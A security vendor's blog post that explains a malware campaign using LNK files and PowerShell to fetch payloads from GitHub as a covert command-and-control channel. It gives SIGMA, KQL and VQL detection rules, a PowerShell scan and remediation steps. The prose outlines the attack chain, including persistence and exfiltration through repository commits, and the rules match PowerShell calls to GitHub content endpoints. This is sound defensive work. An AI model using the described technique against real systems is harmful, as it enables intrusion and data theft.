Back to Intelligence

How to Detect and Mitigate GitHub-Based Covert C2 Attacks

SA
Security Arsenal Team
April 2, 2026
5 min read

Introduction

Defenders face a persistent challenge in identifying malicious activity when attackers abuse trusted platforms. A recent multi-stage malware campaign highlights this risk by leveraging GitHub as a covert command-and-control (C2) channel. By using popular services like GitHub, threat actors can blend in with legitimate developer traffic and bypass traditional network defenses that allow access to these trusted domains. This post analyzes the mechanics of this attack and provides the necessary detection rules and remediation steps to secure your environment.

Technical Analysis

This campaign relies on a chain of obfuscation techniques to establish persistence and communicate with attackers while evading detection.

  • Initial Access: The attack vector begins with LNK files (Windows shortcuts). These are often distributed via phishing emails or compressed archives. When a user clicks the LNK file, it does not open a document as expected but instead executes a hidden command.
  • Execution and Payload Retrieval: The LNK file triggers a PowerShell command designed to reach out to a specific GitHub repository. GitHub is used here as the C2 infrastructure to host malicious payloads or configuration files.
  • Command and Control (C2): Instead of setting up a bespoke server that might be blacklisted, the attackers use GitHub's API or raw content delivery. The malware queries the repository to download encoded scripts or instructions, making the traffic appear as standard web traffic to a trusted domain.
  • Persistence and Data Exfiltration: The downloaded PowerShell scripts often include embedded decoders to unpack the final payload. These scripts may also establish persistence by modifying registry keys or scheduled tasks. Furthermore, the malware can exfiltrate stolen data by committing it back to the attacker's GitHub repository.

Because GitHub is a whitelisted service in many organizations, firewalls and proxies often allow this traffic to pass uninspected. This technique abuses the "living off the land" (LotL) principle, utilizing legitimate tools for malicious purposes.

Defensive Monitoring

To detect this activity, security teams must monitor for unusual process executions involving PowerShell interacting with GitHub endpoints and the creation of suspicious LNK files in user directories. Below are detection mechanisms for SIGMA, Microsoft Sentinel/Defender (KQL), and Velociraptor (VQL).

SIGMA Rules

YAML
---
title: PowerShell Connection to GitHub Raw Content
id: 9e8a5b31-6f4d-4a9c-8b1a-3c5d6e7f8a9b
status: experimental
description: Detects PowerShell processes attempting to download content from raw.githubusercontent.com or api.github.com, which may indicate C2 activity.
references:
  - https://attack.mitre.org/techniques/T1102/002/
author: Security Arsenal
date: 2024/05/23
tags:
  - attack.command_and_control
  - attack.t1102.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'raw.githubusercontent.com'
      - 'api.github.com'
  condition: selection
falsepositives:
  - Legitimate developer scripts or updates
level: medium
---
title: Suspicious LNK File Creation in User Directories
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects the creation of LNK files in common user directories like Downloads or Desktop, a common vector for initial access.
references:
  - https://attack.mitre.org/techniques/T1566/001/
author: Security Arsenal
date: 2024/05/23
tags:
  - attack.initial_access
  - attack.t1566.001
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith: '.lnk'
    TargetFilename|contains:
      - '\Downloads\'
      - '\Desktop\'
  condition: selection
falsepositives:
  - User created shortcuts
level: low

KQL Queries

The following KQL queries can be used in Microsoft Sentinel or Microsoft Defender to identify potential malicious activity related to this campaign.

KQL — Microsoft Sentinel / Defender
// Detect PowerShell processes connecting to GitHub
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("github.com", "raw.githubusercontent.com")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc


// Identify LNK files created in user directories
DeviceFileEvents
| where Timestamp > ago(24h)
| where FileName endswith ".lnk"
| where FolderPath has_any ("/Downloads/", "/Desktop/")
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessAccountName
| order by Timestamp desc

Velociraptor VQL

Velociraptor can be used to hunt for suspicious LNK files on endpoints and analyze process execution logs for GitHub interactions.

VQL — Velociraptor
-- Hunt for recently created LNK files in user profiles
SELECT FullPath, Mtime, Atime, Size
FROM glob(globs='C:/Users/*/Downloads/*.lnk')
WHERE Mtime > now() - 7d

-- Hunt for PowerShell command lines containing GitHub references
SELECT Name, CommandLine, StartTime, Username
FROM process_tracker(period=duration("-7d"))
WHERE Name =~ "powershell"
  AND CommandLine =~ "github"

PowerShell Verification

Use this script to scan for recent LNK files in user directories that might be part of a phishing campaign.

PowerShell
$DateCutoff = (Get-Date).AddDays(-7)
$Paths = @("C:\Users\*\Downloads", "C:\Users\*\Desktop")

foreach ($Path in $Paths) {
    Write-Host "Scanning $Path for recent LNK files..."
    Get-ChildItem -Path $Path -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { $_.LastWriteTime -gt $DateCutoff } | 
    Select-Object FullName, LastWriteTime, Length
}

Remediation

To protect your organization from GitHub-based C2 campaigns and similar threats, implement the following remediation steps:

  1. Network Segmentation and Filtering: While blocking GitHub entirely may not be feasible for all organizations, implement strict egress filtering. Configure proxies to allow GitHub access only for specific IP ranges or user accounts (e.g., developers) and inspect SSL/TLS traffic to identify suspicious patterns.
  2. Application Control: Use AppLocker or Windows Defender Application Control (WDAC) to restrict PowerShell execution. Enforce policies that prevent PowerShell from running scripts downloaded from the internet or require all scripts to be digitally signed.
  3. User Education: Train employees to recognize the signs of phishing. Emphasize that LNK files received via email from unknown senders should never be clicked.
  4. Disable LNK Files: Consider disabling the default behavior of LNK files in temporary internet folders or forcing them to open in a sandboxed environment.
  5. Endpoint Detection and Response (EDR): Ensure EDR solutions are deployed and configured to alert on unsigned PowerShell activity and suspicious process injection techniques.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwareforensicsthreat-huntingc2powershellmalware-detectionwindows-defense

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action